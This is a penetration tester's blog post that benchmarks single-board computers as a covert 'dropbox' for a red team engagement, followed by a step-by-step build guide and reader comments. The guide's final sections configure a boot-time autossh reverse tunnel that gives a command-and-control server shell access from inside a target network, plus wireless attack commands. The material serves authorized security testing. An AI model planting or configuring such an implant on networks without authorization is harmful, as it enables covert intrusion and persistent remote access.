How to Build Your Own Penetration Testing Drop Box
Beau Bullock //
TL;DR
I compared three single-board computers (SBC) against each other with a specific goal of finding which one would serve best as a “penetration testing dropbox”, and maintain an overall price of around $110. Spoiler Alert: At the time I tested these Hardkernel’s ODROID-C2 absolutely destroyed the competition in this space. If you want to skip the SBC comparison and jump right to building your own pentest dropbox you can find the instructions below and also here.
Overview
A few weeks ago I was scheduled for an upcoming Red Team exercise for a retail organization. In preparation for that assessment, I started gathering all the gear I might need to properly infiltrate the organization, and gain access to their network. Social engineering attacks were explicitly removed from the scope for this engagement. This meant I wasn’t going to be able to ask any employees to plug in USB devices, let me in certain rooms, or allow me to “check my email” on their terminals (yes this works).
Essentially, what we’re left at that point were physical attacks. Could I get access to a terminal left unlocked and perform an HID-based (think Rubber Ducky) attack? If the system wasn’t unlocked, perhaps a USB-Ethernet adapter (like the LAN Turtle) could be placed in line with the system to give me a remote shell to work from. Even if I could get physical access, without any prior knowledge of the network’s egress filtering setup, was I going to be able to get a shell out of the network? So this led me down the path of building a pentest dropbox that I could place on a network, could command over a wireless adapter, automatically SSH out of a network, and just be an all-around pentesting box.
Some Device Requirements
Looking into the available options already out there it is very clear that I could either spend over $1,000 to buy something that did what I needed it to do or try to build one comparable for significantly cheaper. So I set some very specific goals of what I wanted this device to do. Here they are:
- Device has to be relatively unnoticeable in size (could be plugged in under a desk unnoticed)
- Has to be able to be controlled over a wireless interface (bonus points if multiple wireless interfaces can be used so wireless management and wireless attacks can happen concurrently)
- Persistent reverse SSH tunnel to a command and control server
- Fully functional pentesting OS (not just a shell to route attacks through)
- Decent storage space (32-64GB)
- Actually be a usable pentesting box that is not sluggish due to hardware restrictions
- Cost around $110 total to build
A Look At the Hardware
I bought three of the most popular single-board computers (SBC) to try to find out which one would be the perfect fit for a pentest dropbox that could accomplish my goals. The devices I put to the test are as follows:
- Raspberry Pi 3 Model B
- BeagleBone Black
- Hardkernel ODROID-C2
Let’s take a look at the hardware specifications of these devices first.
Given the chart above, the ODROID-C2 has the others beat in the Processor, GPU, RAM, Ethernet speed, and Video categories, not to mention the ability to install an eMMC storage module instead of running off of a microSD card. The BeagleBone Black (BBB) has 4GB of onboard flash storage, and more I/O and peripheral options. The Pi 3 does have a built-in Wireless adapter and costs less than the C2 or BBB. Even though the scale was already tipping in the direction of the ODROID-C2 I still gave each device equal treatment in terms of testing them out as pentest drop boxes.
In each case, I bought additional items to complete each system. I found relatively inexpensive cases for the boards, power supplies, storage cards, and wireless adapters where necessary. The BBB and Pi 3 only support the ability to use a microSD card as storage where the ODROID-C2 supports microSD and eMMC. So in the case of the ODROID-C2, I actually tested both storage mediums.
Operating System
I’m a fan of Kali Linux. I use it on pretty much every pentest I perform. Along with the desktop versions of their distribution they also provide images for a number of ARM devices. Each of the devices I compared has Kali images available for them here.
One could definitely substitute a distribution of choice for their own pentest dropbox but I found Kali very easy to install, and familiar given my history with it. In each case, it’s as simple as writing the image file to an external storage medium like a microSD or in the case of the ODROID-C2 an eMMC module then attaching it to the device and booting it up.
Wireless
The Raspberry Pi 3 conveniently has a built-in wireless card. The problem with it is that it doesn’t support monitor mode or packet injection. While yes this card can still be used as an access point, which satisfies the goal of managing the device over WiFI, it is unable to perform any wireless attacks.
I found this relatively inexpensive ($11.99) wireless adapter that does everything I would want it to. This adapter has an RT5370 chipset that supports monitor mode and worked perfectly when injecting packets with Aireplay-ng.
Neither the BBB nor the C2 includes wireless chips on the devices themselves so a USB wireless adapter was required for them. I used the above adapter along with Hostapd to set up an access point (I include a full walkthrough on setting this up at the end) I could connect to in order to manage the device without physically being connected to it. This adapter works with the Pi 3 as well. If you want to perform any wireless attacks with the dropbox, and opt for the Pi 3, I recommend this adapter.
Cases and Overall Look
For the BeagleBone Black, I bought this black case. I noticed that the device was heating up a bit during heavy testing. For the other two devices, I opted for a case that included a case fan.
The ODROID-C2 actually doesn’t have very many options available in terms of cases. However, the ODROID-C2 is almost an exact replica of the Raspberry Pi 3 in terms of where ports are located on the device. So pretty much any Pi 3 case should work for it (with one small exception that you will see momentarily). For both the Pi 3 and the ODROID-C2 I used this Performance Pro Case. This case includes a case fan that is powered by two of the GPIO pins located on the boards.
There is one problem that comes from using a Raspberry Pi case for an ODROID-C2: the power supply socket is the only thing that doesn’t match up perfectly. This is a problem that can easily be solved with a drill.
Total Hardware Costs
I decided to test each device with a 64 GB SanDisk Extreme MicroSDXC UHS-1 card. This storage amount was something that I personally wanted to have but if you don’t need as much storage you can definitely drop the total price by going with lower storage space. I also tested out an eMMC module for the ODROID-C2. I only tested a 32 GB eMMC module due to the cost being so much higher. You will see later on in this post that the cost is very much worth it. Again, the wireless card for the Pi 3 is not completely necessary due to the built-in card but if you want to do any wireless attacks you will need an adapter.
Field Testing the Drop Boxes
After getting each device setup with my initial requirements of what I wanted from a pentest dropbox I performed a few tests to compare how well they actually function as a dropbox. I first tested how fast each system could boot up. To do this I timed from the moment I hit enter after typing ‘reboot’ in a terminal to the moment when the login screen was displayed. I also tested how fast from a reboot I could load the Metasploit console. The ODROID-C2 took 1 minute and 14 seconds from reboot to Metasploit console. This was a full minute faster than the Raspberry Pi 3, and over 2 minutes faster than the BeagleBone Black.
Next, I baselined password cracking speeds on the devices. Granted, I don’t think I would ever have a need or really want to do any cracking on these. I have a decent cracking rig I could always send hashes to. This was more a test of the processors in each of them so that I could have a number to visually see which one was operating faster. To do this I simply used the baseline test functionality from John the Ripper (./john –test). Again, the ODROID-C2 came out on top, and by a lot.
I performed port scans with each device using Nmap against a router. I tested both the standard Nmap command without any flags and also with the Service Detection flag (-sV). There really wasn’t a huge difference between the devices during this test. They all took around 2 seconds for the basic scan and around 2 minutes and 23 seconds for the Service Detection.
The last comparison I did between the devices was to see how fast each of them could write data to storage, and read data from storage. To do this I first used ‘dd’ to write 1 GB of data to disk. Then, I cleared the Linux cache and read the file again using ‘dd’. I also tested buffered and cached reads using ‘hdparm’. When it comes to disk reads and writes this is where the ODROID-C2 absolutely destroys the competition. The ODROID-C2 with the eMMC module is about 15 times faster at writing to disk than the Raspberry Pi 3 with microSD and about 9 times faster at reading data. Even the ODROID-C2 with microSD is still about 2 times faster than the Raspberry Pi 3.
For testing write speeds I used this:
sync; dd if=/dev/zero of=tempfile bs=1M count=1024; sync
For testing read speeds I used this:
/sbin/sysctl -w vm.drop_caches=3 dd if=tempfile of=/dev/null bs=1M count 1024
For testing buffered and cached reads I used this:
hdparm -Tt /dev/mmcblk0
Conclusion
The ODROID-C2 was a much faster and stable build as a pentest dropbox. I ended up taking that device with me on the red team engagement, placed it in a location connected to their network and left it up for three days without a hiccup. The wireless interface saved me, as the network I was plugged into wasn’t set up to hand out DHCP addresses to new devices. I had to manually discover what the subnet was and manually set an IP address to use to route my traffic. If I didn’t have the wireless interface the device would have simply been sitting there not able to connect out to my command and control server.
The ODROID-C2 kept an SSH tunnel to my C2 server up after I set up the interface. The device handled multiple Meterpreter sessions perfectly and felt as if I had a very decent penetration testing system on their network. The other devices were usable but for about the same price you can build a much more powerful dropbox.
Below you will find a full walkthrough guide to build an ODROID-C2 pentest dropbox w/ eMMC yourself. But if you read this and already have one of the other devices or just feel like building a dropbox out of one of the other devices, I have written up instructions for each. You can find PDF’s of each write-up here:
- ODROID-C2 w/ eMMC Pentest DropBox Instructions
- ODROID-C2 w/ microSD Pentest DropBox Instructions
- Raspberry Pi 3 Pentest DropBox Instructions
- BeagleBone Black Pentest DropBox Instructions
Without further ado here is the full walkthrough guide for building the ODROID-C2 Pentest DropBox with an eMMC module:
ODROID-C2 w/ eMMC Pentest DropBox Instructions
Hardware Shopping List (links current as of 8/2/2016)
- ODroid-C2 – $41.95
- DC 5V/2A 2.5 mm power adapter – $6.99
- 32 GB eMMC module for ODROID-C2 (make sure the eMMC to MicroSD adapter is selected as an add-on $1) – $42.95
- MicroSD to USB Adapter – $6.99
- RT5370 Chipset Wireless Antenna – $11.99
- Performance Pro Case for RPi – $9.99
Initial Setup of the Kali Image
- Download the Kali ODROID-C2 image from the Kali downloads site here:
- Flash the Kali image to the eMMC.
- For Windows
- Use an eMMC to microSD adapter, then microSD to USB adapter and connect the eMMC to the Windows system.
- On a Windows system unzip the kali-*-odroidc2.img.xz file with 7zip
- Use Win32DiskImager to write the Kali image to the eMMC.
- For Linux
- Use an eMMC to microSD adapter, then microSD to USB Adapter and connect the eMMC to the Linux system.
- Use the dd tool to image the Kali file to the eMMC (It is very important that you choose the correct storage device here. It is very easy to accidentally wipe out your computers hard disk using this command. In the example below I use /dev/sdb but yours may be different so change accordingly.)
- For Windows
xzcat kali-*-odroidc2.img.xz | dd of=/dev/sdb bs=512k
- Fix eMMC reboot Issue (For some reason the uInitrd file in the boot partition gets corrupted after rebooting. This is a known issue and is documented here: https://github.com/offensive-security/kali-arm-build-scripts/issues/76. The steps below are a workaround that seems to fix this issue for now.)
- While eMMC is still plugged into system copy off the /boot partition (Image, meson64_odroidc2.dtb, and uInitrd).
- Create a “backup” folder in the /boot partition and copy these files there (Image, meson64_odroidc2.dtb, and uInitrd).
- Insert the eMMC card into the ODROID-C2 and boot it up using the power supply, an HDMI cable for display, and keyboard/mouse plugged into the USB ports.
- Login to the Kali Linux distribution with the username of ‘root’ and the password of ‘toor’.
- Mount the boot partition and also make it auto mount on start up using /etc/fstab.
mount /dev/mmcblk0p1 /boot echo '/dev/mmcblk0p1 /boot auto defaults 0 0' >> /etc/fstab
- Create the backup restore script.
nano /boot/backup/restore.sh
- Copy the following into /boot/backup/restore.sh
#!/bin/bash cp /boot/backup/* /boot/
- Make the script executable and make sure it runs without error.
chmod 755 /boot/backup/restore.sh /boot/backup/restore.sh
- Add the script to the rc.local.
nano /etc/rc.local
Add the following line before ‘exit 0’.
/boot/backup/restore.sh
- Plug an Ethernet cable into the ODROID-C2 to provide Internet to the device. The ODROID-C2 should automatically attempt to obtain an IP address via DHCP.
- Change the root password. This can be accomplished by opening up a terminal and typing ‘passwd’ then hitting ‘enter’. Follow the dialog to change the password.
passwd
- Expand the filesystem to cover the entire eMMC. (When the image is flashed to the eMMC it only partitions a portion of the eMMC. You must manually recreate the partition using the below fdisk commands to expand the drive. Run ‘df –H’ before and after to see the difference in the root partition’s available space)
fdisk /dev/mmcblk0 d ###The ‘d’ option allows us to delete a partition 2 ###We select partition 2 to be deleted n ###The ‘n’ option creates a new partition p ###’p’ creates a primary partition 2 ###Set partition number 2 Accept default First sector ###The start sector of the disk Accept default Last sector ###The end sector of the disk w ###Use ‘w’ to write the changes reboot ###reboot, then log back in resize2fs /dev/mmcblk0p2 ###Use resize2fs to grow the partition
- Update and upgrade the Kali distribution.
apt-get update && upgrade
Setup a WiFi Access Point
- Install hostapd.
apt-get install hostapd
- Create the file /etc/hostapd/hostapd.conf. This can be accomplished with the ‘nano’ command.
nano /etc/hostapd/hostapd.conf
- Copy the following into the hostapd.conf file. Modify the ssid, and wpa_passphrase accordingly.
# Interface configuration interface=wlan0 ssid=tortugas channel=1 # WPA configuration macaddr_acl=0 auth_algs=3 ignore_broadcast_ssid=0 wpa=3 wpa_passphrase=@pirateslife4me@ wpa_key_mgmt=WPA-PSK wpa_pairwise=CCMP TKIP rsn_pairwise=CCMP # Hardware configuration driver=nl80211 ieee80211n=1 hw_mode=g
- Modify the file /etc/init.d/hostapd.
nano /etc/init.d/hostapd
Find the line:
DAEMON_CONF=
And change it to:
DAEMON_CONF=/etc/hostapd/hostapd.conf
- Install Dnsmasq.
apt-get install dnsmasq
- Edit /etc/dnsmasq.conf.
nano /etc/dnsmasq.conf
Add the following to /etc/dnsmasq.conf (This will specify dnsmasq to bind to the wlan0 interface and provide DHCP to clients. The range specified below will hand out IP’s in the 172.16.66.50-172.16.66.100 range):
no-resolv # Interface to bind to interface=wlan0 bind-interfaces # Specify starting_range,end_range,lease_time dhcp-range=172.16.66.50,172.16.66.100,255.255.255.0,12h
- Edit /etc/network/interfaces.
nano /etc/network/interfaces
- Add the following to /etc/network/interfaces (This will specify a static IP of 172.16.66.1 for the wlan0 interface).
auto wlan0 allow-hotplug wlan0 iface wlan0 inet static address 172.16.66.1 netmask 255.255.255.0
At this point plug in the Wireless adapter, and attempt to bring up the interface.
airmon-ng check kill hostapd /etc/hostapd/hostapd.conf
If there are no errors you should now be able to connect to the SSID with a wireless device.
- Enable hostapd to start on boot.
update-rc.d hostapd enable
- Enable dnsmasq to start on boot. (I had issues with “update-rc.d dnsmasq enable” here because dnsmasq was starting before wlan0 was up and failing to bind to the interface. Instead, I found adding “service dnsmasq start” to /etc/rc.local works.
nano /etc/rc.local
Add the following line to /etc/rc.local before ‘exit 0’:
service dnsmasq start
Setup Automatic Reverse SSH Tunnel
This section assumes you have a command and control server accessible on the Internet and that server has SSH enabled on port 22.
- Install ‘autossh’ to use to automatically create an SSH tunnel to a command and control server.
apt-get install autossh
- Generate SSH keys.
ssh-keygen #Leave all of the settings default
- Copy /root/.ssh/id_rsa.pub to the C2 server.
scp /root/.ssh/id_rsa.pub root@<C2 IP Address>: /directory/to/upload/to/
- Append the contents of id_rsa.pub to ~/.ssh/authorized_keys or create this file on the C2 server.
# On C2 server cat /directory/to/upload/to/id_rsa.pub >> ~/.ssh/authorized_keys
- Test the key-based authentication. If all goes well you should end up logged into the C2 server without the requirement of entering a password.
# On the ODROID-C2 ssh root@<C2 IP address>
- Test ‘autossh’.
autossh -M 11166 -o “PubkeyAuthentication=yes” -o “PasswordAuthentication=no” -i /root/.ssh/id_rsa -R 6667: localhost:22 root@<C2 IP Address>
If all goes well an ssh session should be established, and port 6667 should now be listening on the C2 server. On the C2 server SSH’ing to this port should provide an SSH shell to the ODROID-C2. The -M option (11166) is a monitor port.
- Add the ‘autossh’ command to /etc/rc.local to establish the SSH tunnel at boot.
nano /etc/rc.local
Add the following to /etc/rc.local
autossh -M 11166 -N -f -o “PubkeyAuthentication=yes” -o “PasswordAuthentication=no” -i /root/.ssh/id_rsa -R 6667: localhost:22 root@<C2 IP Address> &
Flag meanings:
-N: Do not execute a command on the middleman machine
-f: drop in the background
&: Execute this command but do not wait for output or an exit code. If this is not added, your machine might hang at boot.
Final Touches
Some tools are pre-installed on the Kali ARM image but not many (sqlmap, wireshark, nmap, hydra, john, aircrack-ng are installed by default)
- Install whatever tools you want to have on your dropbox. Here are some to get you started:
apt-get install responder metasploit-framework macchanger voiphopper snmpcheck onesixtyone patator isr-evilgrade creddump screen
- To go into “Wireless attack” mode instead of using the card as an access point follow these instructions:
service hostapd stop airmon-ng check kill airmon-ng start wlan0 airodump-ng wlan0mon ### Or any other wireless attack toolkit…
- Optionally, it is possible to connect a second wireless card to use as the “attack” interface.
*Psst* If you liked this blog, we think you’d enjoy Beau’s class:
Available live/virtual and on-demand!
Luca
August 3, 2016 @ 7:57 am
Let’s not forget NanoPi NEO ;]
https://pbs.twimg.com/media/CozLIX_WYAAXRd6.jpg
https://pbs.twimg.com/media/CozLSs0WcAALAHY.jpg
Beau
August 4, 2016 @ 12:51 pm
Luca, I’ll check it out. Thanks.
Antoine
August 4, 2016 @ 9:10 am
Super interesting read ! Thanks for sharing…
Just one (stupid) question, you say that “the wireless interface saved” you and that your device was “placed in a location connected to their network”.
It was plugged to the wired network and you used the wireless interface to configure the wired one ? Or everything was done through the wireless int ? I’m curious about the context… But I’m probably missing something here, as the n00b I am 😉
Beau
August 4, 2016 @ 12:50 pm
Hey Antoine, thanks for reading! Yes, I used the wireless interface to configure the Ethernet interface. The network was not configured to automatically serve up a DHCP address to my drop box. So, simply plugging the device in meant there was no way it could route the reverse SSH tunnel to the command and control server. After manually configuring the eth0 interface to have an IP on their subnet, and route properly through their default gateway it connected out to my command and control server where I then had full remote access to it. I hope that helps.
Noxferatu
August 26, 2016 @ 1:28 pm
Hey Beau,
To follow up on Antoine’s question… To connect to the wireless interface, did you just lurk within range of the wireless? (And, if so, how was the range with the 2dBi antenna?)
skyfall
August 4, 2016 @ 11:51 pm
Guide Was SUPEERB…. in my mind from few days…building a single board pc for pentesting was rolling Idiotly so i started looking some some single board pc availabe in market,,, i came across raspberry pi 3 model b ….i thought it is best in best bt after reading ur guide …n firstly u introduced C2 ….C2 Made Benchmark in single board computers
but sad thing is C2 not available in india…i just want to ask u one question ….i m going to buy raspberry pi3 model b fr same purpose…..
can it will fullfill Pentesting requirement as compared to C2
Please add Conclusion in guide ….How was ur overall Experience….it will help people like me to decide to grab one for us
thank u so much
keep posting more about this topic ,,we are waiting
Beau
August 5, 2016 @ 6:55 am
Hey skyfall, Thanks for the feedback! You mentioned the C2 is not available in India but according to Hardkernel’s website there are a few distributors there. Here’s what I found:
https://www.fabtolab.com/boards/Odroid-Boards
https://www.crazypi.com/ODROID-INDIA?xpage=1&xoffset=1020
Also, the main Hardkernel website will ship worldwide:
http://www.hardkernel.com/main/products/prdt_info.php
To answer your question about whether the Pi 3 could fulfill being a decent pentesting box the answer is that it depends on how hard you are going to push it. With only 1 GB or RAM you will have to be careful with concurrent processes that are memory heavy. It will definitely hold a few Meterpreter shells, and still allow you to run other Metasploit modules concurrently.
skyfall
August 9, 2016 @ 12:16 am
yeah i already checked out..some of are out of stock
i m thinking first i will try my first ever single board computer as raspberry pi 3 after tht when i will be use to then will upgrade to C2
caffeine
August 5, 2016 @ 12:02 am
Wouldn’t restore.sh be simpler as:
#!/bin/bash
cp /boot/backup/* /boot/
?
Beau
August 5, 2016 @ 6:41 am
Thanks for the comment! Yes, we will update the instructions.
geexter
August 5, 2016 @ 12:34 am
Hi, this is a great read. I loved the way you compared with other SBC along with benchmarks. Odroid released XU4 board, with rich features like USB 3.0 and onboard cooler. What you think about this board?
Beau
August 5, 2016 @ 6:40 am
I think the XU4 is an awesome board. The only reason I didn’t include it in this post was because I was trying to keep the prices relatively close to each other to make a fair comparison. If you want to spend the extra $30 the XU4 definitely would be worth doing this with.
There is another board coming out soon that I am really excited to check out. There are a few different models of “UP boards” that are available for pre-order: http://up-shop.org/4-up-boards.
They have Intel Atom processors. The $129 version has 4 GB of RAM, and a 32 GB eMMC!
Antoine
August 5, 2016 @ 12:58 am
Hi Beau,
Yep, it’s crystal clear now, thanks for your response.
ustayready
August 10, 2016 @ 5:55 pm
Great write-up man! 🙂 Inspired me to grab the XU4. Thanks and well done!
erik
August 15, 2016 @ 2:26 pm
I get all the way up to ‘apt-get upgrade’ but the upgrade fails:
Setting up initramfs-tools (0.125) …
update-initramfs: deferring update (trigger activated)
Processing triggers for initramfs-tools (0.125) …
ln: failed to create hard link ‘/boot/initrd.img-3.14.29.dpkg-bak’ => ‘/boot/initrd.img-3.14.29’: Operation not permitted
update-initramfs: Generating /boot/initrd.img-3.14.29
gzip: stdout: No space left on device
E: mkinitramfs failure cpio 141 gzip 1
update-initramfs: failed for /boot/initrd.img-3.14.29 with 1.
dpkg: error processing package initramfs-tools (–configure):
subprocess installed post-installation script returned error exit status 1
Errors were encountered while processing:
initramfs-tools
E: Sub-process /usr/bin/dpkg returned an error code (1)
please help.. 🙁
Beau
August 15, 2016 @ 5:55 pm
Hey Erik,
I actually ran into a similar issue when I was testing these out, and forgot to document the fix in the instructions. Sorry about that. The update is failing because there’s not enough room in the /boot/ directory (due to the fact that we backed files up there). The fix that worked for me was to simply move the uInitrd and Image files to the /root/ partition somewhere, perform the update, then move them back to the backup directory.
Try this:
mv /boot/backup/uInitrd /boot/backup/Image /root/Desktop/
apt-get update && apt-get upgrade
mv /root/Desktop/uInitrd /root/Desktop/Image /boot/backup/
Let me know if that helps. If so, I’ll update the instructions above.
erik
August 15, 2016 @ 7:01 pm
Thanks, i ended up just moving to a micro sd.. as a bonus could you provide some insight into affordable SSH tunnel server hosting? are there services out there, if so who do you recommend?
Beau
August 16, 2016 @ 8:11 am
You can spin up an Amazon EC2 Nano instance very cheap. The cool thing about Amazon is you are only charged for the uptime of the server. Amazon’s Nano instance currently costs only $0.0065 per hour. So, even if you left it running for the whole month it is still less than $5 a month. Nano instances only have .5 GB of RAM and 1 vCPU so they are not ideal for doing much more than being a listener for your drop box but it will definitely work for that purpose. Alternatively, if you want to spend about $10 a month you can get decent VPS’s from either Linode or Digital Ocean. $10 a month at Linode will get you 2 GB’s of RAM.
Hannes
August 21, 2016 @ 2:46 am
Thanks for the post! Would you mind to mention some literature/beginner courses for wireless pentesting?
I am relatively new to this area and would like to know some more details on what is possible and how things can be prevented. Thanks alot!
skyfall
August 22, 2016 @ 10:14 pm
Guys I M Going to Buy Raspberry pi 3 Model B After Two Days
It will My Be first Single Board Computer
Thank u @Beau For Inspiring me…Keep posting More About Pentesting through Raspberry pi
namrood
August 28, 2016 @ 10:54 am
Is it possible to use the otg port as a badusb type device like in nethunter
John
September 7, 2016 @ 1:48 pm
Hello, I did a simular project making my own Onion Pi (a slightly tweaked version for the Raspberry Pi 3) and I had a simular idea to do this too with kali and my pi 3 but I have been having trouble with getting a second interface running on it (bare in mind this was on raspbian). I was wondering if you had any advice for me for setting up a second attack interface. I messed with the interfaces file to see if I could set up wlan1 or something but that was unsuccessful. Any advice you can give would be helpful thank you.
Jon
September 30, 2016 @ 12:45 pm
How do you handle Network Access Control? Does this bypass it?
Beau
September 30, 2016 @ 2:13 pm
Hey Jon,
As of right now no it doesn’t bypass NAC. I use a Beaglebone Black with this to bypass NAC for now: https://github.com/Warpnet/BitM
http://shellsherpa.nl/nac-bypass-8021x-or-beagle-in-the-middle
Looking to port it over to this dropbox in the near future.
Stephen
October 4, 2016 @ 9:59 am
Did you happen to miss a step or some info on the formatting piece? I got the 32GB EMMC card, it fails on reboot with Kali. Other distros work fine. Others are reporting the same issue, flash the image, boot once, fail on reboot, even after following the directions you provided. I’m using a 16GB sdcard and it’s fine. My 32GB sdcard was fine too so I think something is up with the EMMC and not the partition sizes.
Beau
October 4, 2016 @ 11:11 am
That’s the issue that steps 3-6 (starting at “Fix eMMC reboot Issue”) are supposed to fix. So, you are saying you followed those steps, and it is still failing to reboot?
Stephen
October 6, 2016 @ 9:34 am
Yes, just tried it again now to be 100% sure. Another post was saying you can’t use the whole partition, you have to leave some space at the end open, I tired that too with your instructions and no matter what I can’t get it to boot.
brkr19
October 24, 2016 @ 4:12 pm
Stephen, I was at the same point and saw Issue #76 on the repository related to this (https://github.com/offensive-security/kali-arm-build-scripts/issues/76). Following the instructions about changing boot.ini worked for me. I just remounted the eMMC on another computer, commented the second-to-last line, and uncommented the last line. My last three lines now look like this and it boots fine now:
# If using an initramfs, uncomment this and comment out bottom.
#booti ${loadaddr} ${initrd_loadaddr} ${dtb_loadaddr}
booti ${loadaddr} – ${dtb_loadaddr}
Steve Campbell
February 4, 2017 @ 8:03 pm
Very informative article and I really liked the detailed step by step guide and hardware comparison. I’ve been working on making dropboxes for highly secure networks recently where ssh isn’t allowed out. Internet access requires authenticating to a proxy and ssh isn’t allowed unless there’s a firewall exceptions for your IP address. The solution that I came up with that works for me is dns tunneling. Please check out my blog post about this and tell me what you think. https://www.stevencampbell.info/2017/02/configure-pentest-dropbox-dns-tunneling/
Nate
March 26, 2017 @ 11:57 pm
I’m fairly new to info sec, and I am really just dipping my toes in atm. I’ve been in IT for almost 8 years now, but more on network/systems admin side of things. I was following along for setting this up on a Raspberry Pi 3 Model B. My question is. Since R-Pi 3 Model B has the built-in wireless nic, and I also have one of the wireless nics you mentioned connected as well — wouldn’t I need to change all the “wlan0” interface references in the instructions to “wlan1”? I’m a little bit confused. Looking forward to reading more!
Beau
March 29, 2017 @ 5:38 am
Hey Nate,
What I would recommend doing is use the built-in wlan0 as your AP interface for connecting to and use the extra interface for performing wireless attacks. So, you can go through the entire setup guide as is, but then if you plan on doing any wireless attacks use wlan1. After you are connected to the device you could run something like the following to listen on the wlan1 interface with Airodump-ng.
airmon-ng check kill
airmon-ng start wlan1
airodump-ng wlan1mon
Max Demajo
August 7, 2017 @ 12:24 pm
So in all you have three network interfaces, correct? The wired interface, through which you connect using SSH, the seperate wireless interface, which you use for wireless attacks, and the built-in (in the case of Raspberry) for management. What exactly is the management? Wouldn’t this be the SSH connection?
I also see you set up the box as an access point, is this required to make the SSH connections to and from the box? Or is it simply there to function as a Rogue AP for further pentesting?
Great article, wish I had read it sooner as I have just bought a Raspberry Pi, being unaware of the existence of the ODROID 🙁